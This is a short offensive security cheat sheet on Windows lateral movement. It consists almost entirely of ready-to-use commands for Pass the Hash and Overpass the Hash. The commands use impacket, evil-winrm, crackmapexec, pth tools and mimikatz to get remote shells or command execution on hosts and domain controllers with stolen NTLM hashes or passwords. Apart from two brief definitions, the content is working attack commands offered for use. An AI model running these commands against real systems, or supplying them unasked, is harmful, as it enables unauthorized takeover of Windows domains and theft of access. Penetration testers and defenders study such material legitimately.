Lateral Movement
Hey, why are you here? Do you have a hash or a password? A user's NTLM hash or Kerberos ticket can be used directly: why crack hashes and passwords when you can pass them?
Pass the Hash
Pass the Hash -> NTLM hash only (the LM half is left empty or zeroed in the tools below)
# Requires local admin privs on the target
# Hashes
1) impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" <user>@<DC IP>
2) impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" <domain>/<user>@<DC IP>
3) impacket-wmiexec -hashes ":32196B56FFE6F45E294117B91A83BF38" Administrator@<IP>
4) pth-winexe -U Administrator%<LM Hash>:<NTLM Hash> //<IP> cmd
5) evil-winrm -i <IP> -u <User> -H <HASH>
6) python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@<IP>
7) pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //<IP>/c$
8) crackmapexec smb <IP> -u Administrator -H <hash> -x ipconfig
# Password (same psexec syntax, cleartext credential instead of a hash)
1) impacket-psexec <user>:<password>@<ip>
2) impacket-psexec <domain>/<user>:<password>@<ip>
Overpass the Hash
Turn an NTLM hash into a Kerberos ticket and avoid NTLM authentication.
# Requires local admin privs on the source host
mimikatz
sekurlsa::pth /user:<username> /domain:<domain_name> /ntlm:<ntlm_hash> /run:PowerShell.exe
# In the new PowerShell prompt:
net use \\dc01 # Authenticate to a DC; this obtains a TGT and a TGS for the injected credential.
.\PsExec.exe \\dc01 cmd.exe # With the TGT in the logon session, we log in to the DC as that account.